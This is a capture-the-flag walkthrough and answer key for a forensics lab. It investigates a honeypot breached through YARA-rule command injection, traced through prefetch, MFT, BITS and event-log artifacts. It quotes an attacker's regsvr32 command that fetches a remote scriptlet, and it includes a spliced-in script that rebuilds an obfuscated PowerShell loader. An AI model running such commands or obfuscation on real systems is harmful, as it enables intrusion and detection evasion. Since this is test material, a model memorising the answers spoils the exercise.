
YARA Trap

Scenario

Lab Link: YARA Trap

Wowza Enterprise recently deployed a secure malware analysis portal on an isolated workstation, accessible only to internal threat analysts. Promoted as part of a critical infrastructure environment, the portal was secretly configured as a honeypot to detect insider threats. Unexpected behaviors were observed on the system, including rule submissions triggering unexplained command activity and the creation of unfamiliar files. Security teams suspect the portal's functionality was exploited to gain deeper access, potentially enabling the attacker to establish persistence and escalate privileges within the isolated environment.

Your task is to investigate the forensic artifacts provided to uncover how the attacker gained access, what actions they performed, and whether they established any mechanisms to maintain long-term control over the system.

Resources:

Initial Access

Q1

The vulnerability was exploited during the engagement from which IP address?

C:\Users\Administrator\Desktop\Start Here\Tools\CryptnetURLCacheParser>python CryptnetUrlCacheParser.py -d "C:\Users\Administrator\Desktop\Start Here\Artifacts\C\Users\yaranware\AppData\LocalLow\Microsoft\CryptnetUrlCache" -o "C:\Users\Administrator\Desktop\Start Here\output\crypturlout.csv"

Opening the output CSV, you will see:

http://192.168.189.148/sisisisam.exe

Answer

192.168.189.148

Q2

Review the PHP code responsible for processing YARA rules on the honeypot web portal. Which PHP file contains the vulnerable code that was used to execute system commands?

go to:

C:\Users\Administrator\Desktop\Start Here\Artifacts\C\xampp\htdocs

and check the .php files there

Answer

process_yara.php

Q3

Within the vulnerable PHP file, a specific user-supplied variable is passed directly to the system for command execution, resulting in a command injection vulnerability.

review the code in

process_yara.php

Answer

$arguments

Execution

Q4

Following the execution of the initial whoami command, the attacker issued a second system command to gather information from the compromised honeypot. What is the second command executed by the attacker?

Run PECmd.exe on the prefetch directory:

C:\Users\Administrator\Desktop\Start Here\Artifacts\C\Windows\prefetch

Analyzing the output, you will find that whoami was executed at 2025-07-19 07:53:28.

Follow the next commands and you will find:

Answer:

tasklist

Q5

Around 07:58, a system utility was used to retrieve a binary from an external source, which was then executed to gain a foothold on the honeypot. What is the full path of this binary?

In the PECmd output, you will find that certutil was executed. Looking at the MFT around that timestamp, a file was created

Answer:

C:\xampp\htdocs\yara32.exe

Note: I solved this using an unconventional method.

Q6

The binary previously identified was hosted externally and accessed by the attacker during the compromise. What is the full URL used to host this binary?

from our previous identifications

Answer:

http://192.168.189.148/sisisisam.exe

Q7

During the initial exploitation phase, the attacker used a command injection to run whoami.exe. This triggered the creation of a .yar file, which can be identified by correlating its creation time with the execution of this command. What is the name of the .yar file that was created when the whoami command was executed?

In the MFT output, check for .yar files that were created around

2025-07-19 07:53

Answer

20250719_095326Rule.yar

Privilege Escalation

Q8

The attacker escalated privileges by migrating into a process running as LOCAL SYSTEM. Which Windows privilege enabled this action?

Answer:

SeDebugPrivilege

Defense Evasion

Q9

Before establishing persistence, the attacker disabled and cleared the Windows Event Logs. At what time did this action occur?

In the EVTX output, look for Event ID 104 with the description:

Event log cleared

Answer:

2025-07-19 08:20

Persistence

Q10

The attacker created a persistence mechanism that caused the honeypot to execute a remote script. What is the domain name used to host this script?

running

python BitsParser.py -i "C:\Users\Administrator\Desktop\Start Here\Artifacts\C\ProgramData\Microsoft\Network\Downloader"

you will get

C:\Users\Administrator\Desktop\Start Here\Tools\BitsParser>python BitsParser.py -i "C:\Users\Administrator\Desktop\Start Here\Artifacts\C\ProgramData\Microsoft\Network\Downloader"
Processing file C:\Users\Administrator\Desktop\Start Here\Artifacts\C\ProgramData\Microsoft\Network\Downloader\edb.chk
Processing file C:\Users\Administrator\Desktop\Start Here\Artifacts\C\ProgramData\Microsoft\Network\Downloader\edb.log
Processing file C:\Users\Administrator\Desktop\Start Here\Artifacts\C\ProgramData\Microsoft\Network\Downloader\edb00001.log
Processing file C:\Users\Administrator\Desktop\Start Here\Artifacts\C\ProgramData\Microsoft\Network\Downloader\edbres00001.jrs
Processing file C:\Users\Administrator\Desktop\Start Here\Artifacts\C\ProgramData\Microsoft\Network\Downloader\qmgr.db
{
    "JobType": "download",
    "JobPriority": "normal",
    "JobState": "error",
    "JobId": "779b678b-9ef3-41ea-bc10-d4c7e35520f4",
    "JobName": "MicrosoftEdgeUpdateTaskMachineCore",
    "CommandExecuted": "C:\\Windows\\System32\\cmd.exe",
    "CommandArguments": "/c regsvr32 /s /n /u /i:http://wzdsawsd.xyz/N572Pg.sct scrobj.dll",
    "OwnerSID": "S-1-5-18",
    "Owner": "NT AUTHORITY\\SYSTEM"
}
Processing file C:\Users\Administrator\Desktop\Start Here\Artifacts\C\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Answer:

wzdsawsd.xyz

Q11

The attacker used a signed Windows binary to execute a remote script as part of the persistence mechanism. What is the MITRE ATT&CK Sub-Technique ID associated with this behavior?

Answer:

T1218.010

Q12

The attacker created a persistence job that appears in the system with a name and a unique ID. Can you list the name and the ID assigned to this job?

from our previous output in bitsparser

Answer:

MicrosoftEdgeUpdateTaskMachineCore, 779b678b-9ef3-41ea-bc10-d4c7e35520f4
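The BitsParser record above answers Q10 and Q12 by eye; the following is an added triage script (not part of the original writeup or of BitsParser) that parses BitsParser-style output and flags BITS jobs carrying a notification command, the feature the attacker's job used. The sample text is constructed: the first record is the one shown above, the second is a made-up benign job.

```python
import json
import re

# Constructed BitsParser-style output: the first job is the record shown
# above, the second a made-up benign download for contrast.
SAMPLE_OUTPUT = r"""Processing file C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
{
    "JobType": "download",
    "JobState": "error",
    "JobId": "779b678b-9ef3-41ea-bc10-d4c7e35520f4",
    "JobName": "MicrosoftEdgeUpdateTaskMachineCore",
    "CommandExecuted": "C:\\Windows\\System32\\cmd.exe",
    "CommandArguments": "/c regsvr32 /s /n /u /i:http://wzdsawsd.xyz/N572Pg.sct scrobj.dll",
    "OwnerSID": "S-1-5-18",
    "Owner": "NT AUTHORITY\\SYSTEM"
}
{
    "JobType": "download",
    "JobState": "transferred",
    "JobId": "00000000-0000-0000-0000-000000000001",
    "JobName": "ExampleUpdateDownload",
    "OwnerSID": "S-1-5-18",
    "Owner": "NT AUTHORITY\\SYSTEM"
}
Processing file C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
"""

# Signed binaries that have no business being a BITS notification command.
LOLBINS = ("regsvr32", "rundll32", "mshta", "powershell", "wscript", "cscript")
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)

def parse_bits_jobs(text: str) -> list:
    """Return the JSON job records embedded in BitsParser-style output."""
    return [json.loads(m) for m in re.findall(r"\{.*?\}", text, re.S)]

def triage_bits_jobs(text: str) -> list:
    """Flag jobs that run a command when the transfer finishes (T1197 abuse).
    Returns (JobName, JobId, reason) tuples; plain downloads are skipped."""
    hits = []
    for job in parse_bits_jobs(text):
        cmd = job.get("CommandExecuted")
        if not cmd:
            continue  # nothing executes on completion
        args = job.get("CommandArguments", "")
        reasons = [b for b in LOLBINS if b in (cmd + " " + args).lower()]
        reasons += ["remote script " + u for u in URL_RE.findall(args)]
        hits.append((job["JobName"], job["JobId"], ", ".join(reasons) or "notification command set"))
    return hits
```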

Command and Control

Q13

Following the creation of the persistence job, the mechanism was configured to re-execute at fixed intervals. Based on process activity observed in the timeline, how many seconds were set between each execution?

examine the task

Answer:

60

Q14

The attacker used a Background Intelligent Transfer Service (BITS) job to maintain persistence on the honeypot. What is the MITRE ATT&CK Technique ID for this persistence method?

Answer:

T1197

Q15

The PowerShell script executed by the persistence mechanism decodes and injects a shellcode payload into memory. After decoding and decompressing the payload, a SHA256 hash can be calculated. What is the SHA256 hash of the final shellcode?

Answer Format: ****************************************************************

Navigate to the output directory

cd C:\Users\Administrator\Desktop\Start Here\output

View the shellcode event file

type shellcode_event.txt

You'll see a PowerShell event log entry containing obfuscated, base64-encoded and gzip-compressed shellcode, with {0} placeholders and string concatenation operators ('+').

now extract the base64 string from the event log

powershell -Command "$content = Get-Content shellcode_event.txt -Raw; $content -match 'H4sIABa5e2gCA7.+?(?=''\))' | Out-Null; $base64 = $matches[0] -replace '\{0\}','w'; $base64.Length; $base64 | Out-File 'base64_full.txt' -NoNewline"

output:

1996

this extracts the base64 string (replacing {0} with w) and saves it to base64_full.txt. The length is 1996 characters.

verify the extracted base64

type base64_full.txt | more

You'll see the base64 string with the '+' concatenation operators still present.

clean the base64 string by removing concatenation operators

powershell -Command "$base64 = (Get-Content base64_full.txt -Raw) -replace \"'\+'\",''; $base64 | Out-File 'base64_clean.txt' -NoNewline; Write-Host 'Cleaned base64, length:' $base64.Length"

output:

Cleaned base64, length: 1936

decode and decompress the base64 gzip stream

powershell -Command "$base64 = Get-Content base64_clean.txt -Raw; $decodedBytes = [System.Convert]::FromBase64String($base64); $ms = New-Object System.IO.MemoryStream(,$decodedBytes); $gzip = New-Object System.IO.Compression.GzipStream($ms, [System.IO.Compression.CompressionMode]::Decompress); $sr = New-Object System.IO.StreamReader($gzip); $decompressed = $sr.ReadToEnd(); $sr.Close(); $decompressed | Out-File 'decompressed_shellcode.txt' -Encoding UTF8; Write-Host 'Decompressed successfully, length:' $decompressed.Length"

output:

Decompressed successfully, length: 3115

view the decompressed PowerShell script

type decompressed_shellcode.txt | more

In it you will see:

  • Function definitions (bm, uHcj)
  • A base64-encoded shellcode in variable $oJB
  • Code that allocates memory, copies shellcode, and executes it

Take the base64 string from $oJB, decode it and hash the bytes:

C:\Users\Administrator\Desktop\Start Here\output>powershell -Command "$shellcodeB64 = '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'; $shellcodeBytes = [System.Convert]::FromBase64String($shellcodeB64); $sha256 = [System.Security.Cryptography.SHA256]::Create(); $hash = $sha256.ComputeHash($shellcodeBytes); $hashString = [System.BitConverter]::ToString($hash) -replace '-',''; Write-Host 'SHA256:' $hashString; $hashString | Out-File 'final_shellcode_hash.txt' -NoNewline"
SHA256: F77CDB7980E5B9883809BA3B4F11CC685C3ED6E70A24B3B3204D5C51D6C0E589

C:\Users\Administrator\Desktop\Start Here\output>

Answer:

F77CDB7980E5B9883809BA3B4F11CC685C3ED6E70A24B3B3204D5C51D6C0E589
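The Q15 steps above (extract the blob, resolve {0}, drop the '+' joins, base64-decode, gunzip, pull $oJB, hash) chained into one script. This is an added example, not code from the writeup; it builds its own constructed event text from a placeholder payload (b"abc", not shellcode) so it runs offline, and it generalizes the extraction regex to the base64 of the gzip magic ('H4sI') rather than the exact prefix used above.

```python
import base64
import gzip
import hashlib
import re

# Constructed stand-in for the decompressed stager (not the lab's script):
# it stores the final payload base64-encoded in $oJB, as the real one does.
# The payload here is the placeholder b"abc", not shellcode.
PAYLOAD = b"abc"
INNER_SCRIPT = (
    "function bm { param($a) }\n"
    "$oJB = '" + base64.b64encode(PAYLOAD).decode() + "'\n"
    "# ... allocate memory, copy $oJB, execute ...\n"
)

def build_obfuscated_event(script: str) -> str:
    """Reproduce the obfuscation seen in the event: gzip + base64, the string
    split with '+' concatenation, and every 'w' hidden behind a {0} that the
    -f format operator fills in at run time. Returns a constructed log line."""
    b64 = base64.b64encode(gzip.compress(script.encode(), mtime=0)).decode()
    pieces = [b64[i:i + 40] for i in range(0, len(b64), 40)]
    joined = "'+'".join(pieces).replace("w", "{0}")
    return "powershell -nop -w hidden -c \"iex ((('" + joined + "') -f 'w'))\""

def recover_inner_script(event_text: str) -> str:
    """Undo it: grab the blob (base64 of the gzip magic is 'H4sI') up to the
    closing quote-paren, resolve {0} -> w, drop the '+' joins, decode, gunzip."""
    m = re.search(r"H4sI.+?(?='\))", event_text)
    if not m:
        raise ValueError("no gzip/base64 blob found in event text")
    b64 = m.group(0).replace("{0}", "w").replace("'+'", "")
    return gzip.decompress(base64.b64decode(b64)).decode()

def final_shellcode_sha256(event_text: str) -> str:
    """Pull the $oJB base64 out of the recovered script, decode it and return
    the uppercase hex SHA256 of the bytes, as the lab asks for."""
    script = recover_inner_script(event_text)
    m = re.search(r"\$oJB\s*=\s*'([A-Za-z0-9+/=]+)'", script)
    if not m:
        raise ValueError("no $oJB payload in decompressed script")
    return hashlib.sha256(base64.b64decode(m.group(1))).hexdigest().upper()

if __name__ == "__main__":
    event = build_obfuscated_event(INNER_SCRIPT)
    print(final_shellcode_sha256(event))
```

Point it at the real entry by reading shellcode_event.txt into event_text instead of calling build_obfuscated_event.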

Q16

After the script was executed around 08:26, it retrieved another payload from the attacker's C2 server. What is the full URL used to host this payload?

looking at the powershell script that was executed at that time in evtx logs

Answer

http://192.168.189.148/N572Pg

Discovery

Q17

After 08:25, the attacker attempted to discover other hosts within the honeypot network. How many times was this discovery action carried out?

Answer:

3

Lateral Movement

Q18

How many times was the file identified in the previous question executed during the attack?

Answer:

2

Q19

An unusual executable not found on standard Windows systems was observed during the attack and linked to lateral movement. What is the name of this file?

Answer Format: ********.***

cd C:\Users\Administrator\Desktop\Start Here\output

Search the prefetch timeline for executables run between 08:30 and 08:36 (the lateral movement timeframe):

findstr /i "08:3[0-6]" prefetch_analysis_Timeline.csv

We found REGSVR64.EXE:

  • REGSVR64.EXE is NOT a standard Windows executable
  • Standard Windows has REGSVR32.EXE (for 32-bit) but NOT REGSVR64.EXE
  • It appears during the lateral movement timeframe (08:34:46 and 08:35:36)

Answer:

REGSVR64.EXE

Q20

The executable identified in the previous question was a renamed version of a well-known Sysinternals tool commonly used for lateral movement. What is the original name of this tool?

Answer

PsExec

Containment

Q21

To contain the incident, WhiteLotus changed the honeypot's network mode, disconnecting it from the attacker and terminating active sessions. Based on the DHCP logs, what is the exact timestamp of this containment action?

Answer

2025-07-19 08:36
